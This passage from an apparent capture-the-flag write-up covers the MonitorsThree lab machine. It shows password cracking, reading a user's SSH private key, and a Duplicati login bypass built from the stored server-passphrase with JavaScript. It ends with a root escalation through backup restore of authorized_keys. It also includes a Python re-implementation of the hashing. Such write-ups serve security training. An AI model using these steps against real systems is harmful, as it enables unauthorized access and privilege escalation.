Status...........: Quit
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: hash
Time.Started.....: Tue Jan 14 22:34:55 2025 (6 mins, 27 secs)
Time.Estimated...: Fri Jan 17 08:56:25 2025 (2 days, 10 hours)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:      137 H/s (7.10ms) @ Accel:8 Loops:16 Thr:1 Vec:1
Recovered........: 1/3 (33.33%) Digests (total), 1/3 (33.33%) Digests (new), 1/3 (33.33%) Salts
Progress.........: 78656/43033155 (0.18%)
Rejected.........: 0/78656 (0.00%)
Restore.Point....: 26176/14344385 (0.18%)
Restore.Sub.#1...: Salt:2 Amplifier:0-1 Iteration:640-656
Candidate.Engine.: Device Generator
Candidates.#1....: 241987 -> 100785
Hardware.Mon.#1..: Temp: 85c Util: 94%

Started: Tue Jan 14 22:34:14 2025
Stopped: Tue Jan 14 22:41:23 2025
```

The password cannot be used for **`ssh`** login as **marcus**, but we can switch to marcus with **`su`** from the previously gained shell and copy the ***id\_rsa*** file to **`ssh`** in.

{% tabs %}
{% tab title="SSH Login Try" %}

```bash
ssh marcus@10.10.11.30
The authenticity of host '10.10.11.30 (10.10.11.30)' can't be established.
ED25519 key fingerprint is SHA256:1llzaKeglum8R0dawipiv9mSGU33yzoUW3frO9MAF6U.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.30' (ED25519) to the list of known hosts.
marcus@10.10.11.30: Permission denied (publickey).
```

{% endtab %}

{% tab title="Getting id\_rsa" %}

```bash
(Meterpreter 1)(/var/www/html/cacti/include) > shell
Process 16195 created.
Channel 1 created.
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@monitorsthree:~/html/cacti/include$ su marcus
su marcus
Password: 12345678910

marcus@monitorsthree:/var/www/html/cacti/include$ cat ~/.ssh/id_rsa
cat ~/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
...
-----END OPENSSH PRIVATE KEY-----
```

{% endtab %}
{% endtabs %}

Copy and paste the ***id\_rsa*** into a file on the local machine and change its **permissions**.

```bash
chmod 600 id_rsa

ssh -i id_rsa marcus@10.10.11.30
Last login: Tue Aug 20 11:34:00 2024
marcus@monitorsthree:~$
```

{% hint style="info" %}
The user.txt file contains the user flag :clap:
{% endhint %}

### Pillaging - marcus \[user]

The marcus user is running the **duplicati** service on port **8200**.

**Duplicati** is a free, open-source backup client that securely stores encrypted, incremental, and compressed backups on cloud storage services and remote file servers.

```bash
marcus@monitorsthree:~$ netstat -tlnp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:8084            0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:44967         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8200          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -  

marcus@monitorsthree:~$ wget http://127.0.0.1:8200
--2025-01-15 03:50:11--  http://127.0.0.1:8200/
Connecting to 127.0.0.1:8200... connected.
HTTP request sent, awaiting response... 302 Redirect
Location: /login.html [following]
--2025-01-15 03:50:11--  http://127.0.0.1:8200/login.html
Reusing existing connection to 127.0.0.1:8200.
HTTP request sent, awaiting response... 200 OK
Length: 1239 (1.2K) [text/html]
Saving to: ‘index.html’

index.html                                  100%[========================================================================================>]   1.21K  --.-KB/s    in 0.04s   

2025-01-15 03:50:11 (30.0 KB/s) - ‘index.html’ saved [1239/1239]

marcus@monitorsthree:~$ cat index.html
```

```html
<!doctype html>
<html>
<head>
    <meta charset="utf-8">
      <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    
    <title>Duplicati Login</title>
    
    <script type="text/javascript" src="login/jquery-2.0.3.min.js"></script>
    <script type="text/javascript" src="login/cryptojs.js"></script>
    <script type="text/javascript" src="login/login.js?v=2.0.8.1"></script>
    <link rel="stylesheet" type="text/css" href="login/login.css?v=2.0.8.1" />

    <script type="text/javascript" src="oem/root/login/oem.js?v=2.0.8.1" ></script>
    <link rel="stylesheet" type="text/css" href="oem/root/login/oem.css?v=2.0.8.1" />
</head>

<body>
    <div id="login">
        <h2>Duplicati</h2>
        <form method="POST">
            <fieldset>

                <p><label for="login-password">Password</label></p>
                <p><input type="password" id="login-password" value="password" onBlur="if(this.value=='')this.value='password'" onFocus="if(this.value=='password')this.value=''" autofocus></p> <!-- JS because of IE support; better: placeholder="password" -->

                <p><input type="submit" id="login-button" value="Sign In"></p>

            </fieldset>
        </form>
    </div>
</body>    
</html>
```

Searching for the **duplicati** folder leads us to the **config** folder, which contains the ***Duplicati-server.sqlite*** file.

```bash
marcus@monitorsthree:~$ cd /
marcus@monitorsthree:/$ find -type d -name duplicati 2>/dev/null
./opt/duplicati
marcus@monitorsthree:/$ cd /opt/duplicati
marcus@monitorsthree:/opt/duplicati$ ls
config
marcus@monitorsthree:/opt/duplicati$ cd config
marcus@monitorsthree:/opt/duplicati/config$ ls
control_dir_v2  CTADPNHLTC.sqlite  Duplicati-server.sqlite
marcus@monitorsthree:/opt/duplicati/config$ 
```

Download the ***Duplicati-server.sqlite*** using **`scp`** and enumerate it using **`sqlite3`**.

```bash
scp -i id_rsa marcus@10.10.11.30:/opt/duplicati/config/Duplicati-server.sqlite .
```

```bash
sqlite3 Duplicati-server.sqlite
SQLite version 3.40.1 2022-12-28 14:03:47
Enter ".help" for usage hints.
sqlite> .tables
Backup        Log           Option        TempFile    
ErrorLog      Metadata      Schedule      UIStorage   
Filter        Notification  Source        Version     
```

### Exploit - Duplicati Login Authentication Bypass with server-passphrase

This **duplicati** version is vulnerable to a login authentication bypass using the server-passphrase. The post below shows the **PoC** for the **duplicati** login bypass using the server-passphrase.

{% embed url="<https://medium.com/@STarXT/duplicati-bypassing-login-authentication-with-server-passphrase-024d6991e9ee>" %}

* **Port forward** port 8200 via **`ssh`**.

```bash
ssh -i id_rsa -L 8200:localhost:8200 marcus@10.10.11.30
```

<figure><img src="https://2174268648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fub7j4GBqzIfnf6FfkeT7%2Fuploads%2F7H7qYgXr0qm5LQ5k9fxm%2Fduplicati_login.png?alt=media&#x26;token=c80f7857-4e71-46d2-984e-0eaf66ffa412" alt=""><figcaption></figcaption></figure>

* The ***Duplicati-server.sqlite*** contains the **server-passphrase** in the **Option** table.

```bash
sqlite> SELECT * FROM Option;
4||encryption-module|
4||compression-module|zip
4||dblock-size|50mb
4||--no-encryption|true
-1||--asynchronous-upload-limit|50
-1||--asynchronous-concurrent-upload-limit|50
-2||startup-delay|0s
-2||max-download-speed|
-2||max-upload-speed|
-2||thread-priority|
-2||last-webserver-port|8200
-2||is-first-run|
-2||server-port-changed|True
-2||server-passphrase|Wb6e855L3sN9LTaCuwPXuautswTIQbekmMAr7BrK2Ho=
-2||server-passphrase-salt|xTfykWV1dATpFZvPhClEJLJzYA5A4L74hX7FK8XmY0I=
-2||server-passphrase-trayicon|5e7d1ded-124e-4139-af7b-1b4b40026a0f
-2||server-passphrase-trayicon-hash|yU1y7roWxv5XAV8DzSRBJLC47Re67GycGbvuqn2XDvo=
-2||last-update-check|638724745250801590
-2||update-check-interval|
-2||update-check-latest|
-2||unacked-error|False
-2||unacked-warning|False
-2||server-listen-interface|any
-2||server-ssl-certificate|
-2||has-fixed-invalid-backup-id|True
-2||update-channel|
-2||usage-reporter-level|
-2||has-asked-for-password-protection|true
-2||disable-tray-icon-login|false
-2||allowed-hostnames|*
sqlite> 
```

* The ***login.js*** contains the **login logic**. It can be used to **craft** the **password** and authenticate ourselves.

```javascript
// saltedpwd = SHA256(utf8(password) || base64decode(salt)); "+" on CryptoJS WordArrays concatenates their hex strings
var saltedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Utf8.parse($('#login-password').val()) + CryptoJS.enc.Base64.parse(data.Salt)));
// noncedpwd = base64(SHA256(base64decode(nonce) || saltedpwd)); this is the value POSTed as the password
var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse(data.Nonce) + saltedpwd)).toString(CryptoJS.enc.Base64);
```

{% hint style="info" %}
The base64 salt value is decoded and represented as hexadecimal before hashing.
{% endhint %}

* Intercept the duplicati login request using **`burpsuite`**. Don't forward the ***login.cgi*** POST request with the password parameter yet; first get the **nonce**. The **salt** also matches the one in the **duplicati database**.

<figure><img src="https://2174268648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fub7j4GBqzIfnf6FfkeT7%2Fuploads%2FCQhPkLlFZOs3qznDma7l%2Fsalt-value-match.png?alt=media&#x26;token=acb7b42a-5f17-4936-a05b-51ea4ea46ef9" alt=""><figcaption></figcaption></figure>

* Convert the **`base64`** server-passphrase value into hexadecimal.

```bash
echo Wb6e855L3sN9LTaCuwPXuautswTIQbekmMAr7BrK2Ho= | base64 -d | xxd -p -c 128
59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a
```

* Once we have the above hex, we can generate the valid password using that hex and the nonce.
* Open the **dev-tools** console and paste the code below.

```javascript
var saltedpwd = '59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a'; 
var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse('FDes7AvOEeG0FvjYjZRI2Cn0NojhpthKsIuxvsbzF+I=') + saltedpwd)).toString(CryptoJS.enc.Base64);
console.log(noncedpwd);
```

* Copy the string printed in the console and paste it into the password parameter. URL encode the password by pressing **`Ctrl`** + **`U`**, then forward the request.

<figure><img src="https://2174268648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fub7j4GBqzIfnf6FfkeT7%2Fuploads%2FCYcYwSOf2Ba5jCTOLPxT%2Fduplicati-valid-password.png?alt=media&#x26;token=1113a852-b24c-43a9-bfea-a956de894807" alt=""><figcaption></figcaption></figure>

* If successful we will get the **duplicati** index page; otherwise we will get an authentication failed alert.

<figure><img src="https://2174268648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fub7j4GBqzIfnf6FfkeT7%2Fuploads%2F3FPVBTZnJ8PVLtPtPru0%2Fduplicati_dashboard.png?alt=media&#x26;token=b1d96bec-218c-4c13-a3f6-3e144c8d66af" alt=""><figcaption></figcaption></figure>
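To make the login logic above explicit, here is an added Python re-implementation (not from the writeup or from Duplicati) of the two hashes login.js computes. It uses the server-passphrase, salt and nonce quoted in this writeup plus a constructed password, and shows the defender's takeaway: the stored server-passphrase is exactly `saltedpwd`, so anyone who can read Duplicati-server.sqlite holds a password-equivalent, and the SQLite file needs the same protection as the password itself.

```python
import base64
import hashlib

# Values quoted in this writeup: the stored verifier and salt from the Option
# table, and the nonce returned by login.cgi during the captured session.
SERVER_PASSPHRASE_B64 = "Wb6e855L3sN9LTaCuwPXuautswTIQbekmMAr7BrK2Ho="
SERVER_SALT_B64 = "xTfykWV1dATpFZvPhClEJLJzYA5A4L74hX7FK8XmY0I="
NONCE_B64 = "FDes7AvOEeG0FvjYjZRI2Cn0NojhpthKsIuxvsbzF+I="


def salted_password(password: str, salt_b64: str) -> bytes:
    """saltedpwd from login.js: SHA256(utf8(password) || base64decode(salt)).

    Duplicati persists this same digest (base64-encoded) as server-passphrase.
    """
    return hashlib.sha256(password.encode("utf-8") + base64.b64decode(salt_b64)).digest()


def nonced_response(saltedpwd: bytes, nonce_b64: str) -> str:
    """noncedpwd from login.js: base64(SHA256(base64decode(nonce) || saltedpwd))."""
    digest = hashlib.sha256(base64.b64decode(nonce_b64) + saltedpwd).digest()
    return base64.b64encode(digest).decode("ascii")


def stored_verifier_hex(server_passphrase_b64: str) -> str:
    """Same conversion as the `base64 -d | xxd -p` step above: verifier as raw hex."""
    return base64.b64decode(server_passphrase_b64).hex()


def verifier_is_password_equivalent(password: str, salt_b64: str, nonce_b64: str) -> bool:
    """Defender's check on the scheme itself.

    The response a legitimate client derives from the real password equals the
    response derived from the stored verifier alone, so the verifier is a
    password-equivalent: reading it is as good as knowing the password.
    """
    stored_b64 = base64.b64encode(salted_password(password, salt_b64)).decode("ascii")
    from_password = nonced_response(salted_password(password, salt_b64), nonce_b64)
    from_verifier = nonced_response(base64.b64decode(stored_b64), nonce_b64)
    return from_password == from_verifier


if __name__ == "__main__":
    # Constructed password: the real one is never needed for the demonstration.
    print(stored_verifier_hex(SERVER_PASSPHRASE_B64))
    print(verifier_is_password_equivalent("constructed-example-password", SERVER_SALT_B64, NONCE_B64))
```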

### Shell - root

The accessed duplicati can be used to copy content from the system and restore it into marcus's home directory, or vice-versa. I tried backing up the ***id\_rsa*** of the root user but it was not present. The marcus user has an ***authorized\_keys*** file in the ***/home/marcus/.ssh*** directory, which we can back up and restore into the ***/root/.ssh*** directory, after which we can ssh into root from marcus.

* Create a backup of ***authorized\_keys*** and restore it into the ***/root/.ssh*** directory.

<figure><img src="https://2174268648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fub7j4GBqzIfnf6FfkeT7%2Fuploads%2FDF8gRH8wBLO4CCR4rLO2%2Fbackup.gif?alt=media&#x26;token=fb5e51a5-b2ad-4b18-b6be-a9e1bd237359" alt=""><figcaption><p>Creating Backup</p></figcaption></figure>

<figure><img src="https://2174268648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fub7j4GBqzIfnf6FfkeT7%2Fuploads%2FyN0fgJZjiuohM5JNMp0g%2Frestore.gif?alt=media&#x26;token=49be39c3-c79b-434e-954b-56b9e70bb42d" alt=""><figcaption><p>Restoring backup</p></figcaption></figure>

```bash
marcus@monitorsthree:~$ ssh root@10.10.11.30
The authenticity of host '10.10.11.30 (10.10.11.30)' can't be established.
ED25519 key fingerprint is SHA256:1llzaKeglum8R0dawipiv9mSGU33yzoUW3frO9MAF6U.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.30' (ED25519) to the list of known hosts.
Last login: Tue Aug 20 15:21:21 2024
root@monitorsthree:~# 
```

{% hint style="info" %}
The root.txt file contains the root flag :tada:
{% endhint %}

## Proof of Concept

The video below provides the **PoC** for the MonitorsThree machine.

{% embed url="<https://odysee.com/@runasdexter:a/monitorsthree:5>" %}
